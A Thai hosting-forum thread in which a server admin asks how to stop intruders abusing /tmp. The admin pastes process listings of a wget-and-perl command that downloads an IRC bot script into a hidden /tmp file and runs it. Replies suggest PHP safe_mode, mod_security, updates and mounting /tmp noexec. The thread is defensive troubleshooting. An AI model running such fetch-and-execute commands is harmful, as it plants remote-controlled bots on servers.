มีทางกันพวกชอบใช้เครื่องเรา ได้ไหม เข้าทาง tmp

คือมันจะมี พวกชอบเอาเครื่องผมไป ยิงชาวบ้านบ้าง
เอามาโหลด หรือ ส่งเมล์ บ้าง อะไรประมาณนี้นะครับ

ตัวอย่างวันนี้
1823 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1824 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2
1846 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1847 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2
1856 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1857 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2

คือมันเอาไปเก็บไว้ที่ tmp นะครับ
เราจะตามได้ไหมว่าเป็นที่ ลูกค้าเรา ฝั่ง script เอง หรือว่า คนนอก เอามาใส่
มีทางกันไหมครับ มันขึ้น perl ใช้งานค่อนข้างหนักเหมือนกัน

น่าจะมาจากทาง phpBB2 เก่า หรือเปล่าครับ

http://www.thaihosttalk.com/index.php?showtopic=1123

script ตัวนี้เป็น IRC Bot ภาษา perl ครับ

วิธีป้องกันแบบพื้นฐานก็คือ… เปิด safe_mode ใน php แล้วเซต safe_mode.execdir ให้เป็น /noexec ครับ

IRC Bot มาเยี่ยมเยือนท่านแล้วนะครับ แสดงว่ามีพวก IRC มาสำรวจท่านแล้ว
ผมเคยโดนเหมือนกัน ถ้าจำไม่ผิดไฟล์บอทจะเก็บไว้ที่ /tmp ครับ…

แล้วให้จับ ps ดูนะครับ เพราะ kill แล้วมันก็จะรันตัวเองขึ้นมาอีก…

แต่วิธีเอาออกผมก็ลืมแล้วแฮะ นั่งแก้ไปเรื่อยๆ ตอนนี้สบายแล้วคร๊าบ

นั่นสิครับ
ผม kill แล้วมันก็กลับมาเหมือนเดิม
ส่วน safe mode ก็กลัวว่า จะมีผล ต่อเวปอื่น
หรือการใช้งาน php หรือเปล่านะครับ

นั่นสิครับ
ผม kill แล้วมันก็กลับมาเหมือนเดิม
ส่วน safe mode ก็กลัวว่า จะมีผล ต่อเวปอื่น
หรือการใช้งาน php หรือเปล่านะครับ

เท่าที่ผมเคยลอง ถ้าเป็น script ธรรมดาก็รับหมดครับ ส่วน script ไม่ธรรมดานั่นคงมีจุดประสงค์อะไรแฝงอยู่แล้ว

Mambo มันยัง recomment safe_mode เป็น on เลย

วิธีป้องกัน หมั่นอัพเดทสคริบดังๆ แล้วก็ใช้ Mod_security+ เมาท์ tmp ,/var/tmp ให้เป็น noexec,nosuid